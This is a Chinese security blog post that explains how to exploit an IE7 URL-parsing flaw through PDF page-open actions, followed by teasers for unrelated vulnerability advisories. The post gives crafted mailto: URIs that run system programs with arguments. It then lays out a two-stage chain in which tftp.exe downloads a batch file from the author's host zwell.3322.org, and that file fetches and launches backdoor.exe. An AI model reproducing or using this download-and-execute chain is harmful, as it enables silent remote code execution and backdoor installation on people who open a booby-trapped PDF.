URL解析漏洞在PDF文档中的利用

所属分类: 网络安全 / 漏洞分析 阅读数: 225
收藏 0 赞 0 分享
右键另存再打开测试文档,否则会调用IE的插件打开,测试会失败。如果你硬要通过点击打开的话,点击这里吧,嘿嘿,这本身也是IE的一个解析漏洞。

在http://seclists.org/fulldisclosure/2007/Oct/0068.html看到这个漏洞的时候,一时还没有想到怎么利用。后来结合去年有一个关于pdf actions安全隐患的这么一个问题(参看http://michaeldaw.org/md-hacks/backdooring-pdf-files/),pdf中的actions中打开页面的事件刚好可以用来利用。

Petko Petkov之前放出话说pdf的0day应该也就是指的是这个漏洞了。利用这个漏洞首先需要安装IE7,在URL解析时遇到百分号(%)会执行后面的程序。放出来的利用方式为:

mailto:test%../../../../windows/system32/calc.exe".cmd
http:%xx../../../../../../../../../../../windows/system32/calc.exe".bat

利用这种URL咱们可以执行系统中的任意命令了,但是有一点用处的系统命令都得加参数才能用啊。怎么加入参数呢?反正放在.cmd前就行,但是必须放在引号(")后面,呵呵,其实没的选。经过测试,下面的语句就ok了:

mailto:test%../../../../windows/system32/net.exe" “user”.cmd

要有多个参数的话就的

mailto:test%../../../../windows/system32/xxx.exe" “argv1” ”argv2“.cmd

到这里,基本上大家也就有了利用办法了,网络COPY命令,TFTP等都行啊。不过得分两步:

1.下载程序
2.执行程序

还有一点要注意的,最好在打开页面事件和关闭页面时间中加入上面两步,以免因为网速问题造成程序执行不成功。

mailto:test%..\..\..\..\windows\system32\tftp.exe" "-i" "zwell.3322.org" "GET" "a.bat" "c:\a".cmd
mailto:test%..\..\..\..\windows\system32\cmd.exe" "/c c:\a".cmd

在zwell.3322.org上我搭建了一个TFTP服务器,里面放有一个a.cmd,内容就是再去下载执行一个程序。
在pdf打开首页时执行第一条指令,下载服务器上的a.bat,保存为a.cmd(为什么是cmd,大家可以思考一下)。
在离开该页面时,再执行已经下载的a.cmd,其实他是个bat文件,内容是:

cmd /c tftp -i zwell.3322.org GET backdoor.exe c:\b.exe
start c:\b.exe

好了,现在下载了backdoor.exe程序(这只是一个notepad程序,我重命名了)并且执行了。gameover。
更多精彩内容其他人还在看

OpenBSD处理畸形的IPv6数据多个远程拒绝服务漏洞

受影响系统: OpenBSD OpenBSD 4.2 OpenBSD OpenBSD 4.1 描述: OpenBSD是一款开放源代码Unix类操作系统。 OpenBSD处理畸形的IPv6数据时存在漏洞,远程攻击者可能利用此漏洞导致内核忙碌。
收藏 0 赞 0 分享

PunBB口令重置弱随机数绕过安全限制漏洞

PunBB是一款基于PHP的论坛程序。 PunBB的口令重置功能实现上存在漏洞,远程攻击者可能利用此漏洞在特定条件重置用户的口令。 如果用户忘记了口令的话,可使用PunBB的口令重置功能重置。在请求口令重置后,论坛会向用户发送一封邮件,包含有一个新的随机口令以及激
收藏 0 赞 0 分享

Novell iPrint ienipp.ocx ActiveX 控件溢出漏洞

受影响系统: Novell iPrint Client for Windows 4.32 Novell iPrint Client for Windows 4.26 不受影响系统: Novell iPrint Client for Windows 4
收藏 0 赞 0 分享

Apple iPhoto 存在订阅远程格式串处理漏洞

受影响系统: Apple iPhoto '08 7.1 不受影响系统: Apple iPhoto 7.1.2 描述: ----------------------------------------------
收藏 0 赞 0 分享

Linux Kernel vmsplice_to_pipe本地权限提升漏洞

受影响系统: Linux kernel 2.6.17 - 2.6.24.1 不受影响系统: Linux kernel 2.6.24.2 描述: Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux K
收藏 0 赞 0 分享

Cisco Unified IP Phone SCCP及SIP 协议安全漏洞

受影响系统: Cisco Unified IP Phone 7971G Cisco Unified IP Phone 7970G Cisco Unified IP Phone 7961G Cisco Unified IP Phone 7960G Ci
收藏 0 赞 0 分享

Invision Power Board BBCode 处理 HTML注入漏洞

受影响系统: Invision PS IPB 2.3.4 描述: Invision Power Board是一个非常流行的PHP论坛程序。 IPB处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞攻击其他Web用户。 IPB没
收藏 0 赞 0 分享

BBSXP绕过过滤继续注入漏洞分析

漏洞分析: 官方最新过滤函数HTMLEncode,这次过滤了字符* ,再一次绕过过滤注射 Function HTMLEncode(fString) fString=Replace(fString,CHR(9),"") fString=Repla
收藏 0 赞 0 分享

新云CMS Online.asp页面过滤不严导致SQL注入漏洞

受影响系统: 最新版本 漏洞文件: /inc/online.asp 代码分析如下: OnlineSQL = "INSERT INTO NC_Online(id,ChannelID,username,identitys,station,ip
收藏 0 赞 0 分享

CA BrightStor ARCserve Backup 存漏洞

受影响系统: Computer Associates BrightStor ARCserve Backup 11.5.2.0 (SP2) 描述: ----------------------------------------------------------
收藏 0 赞 0 分享
查看更多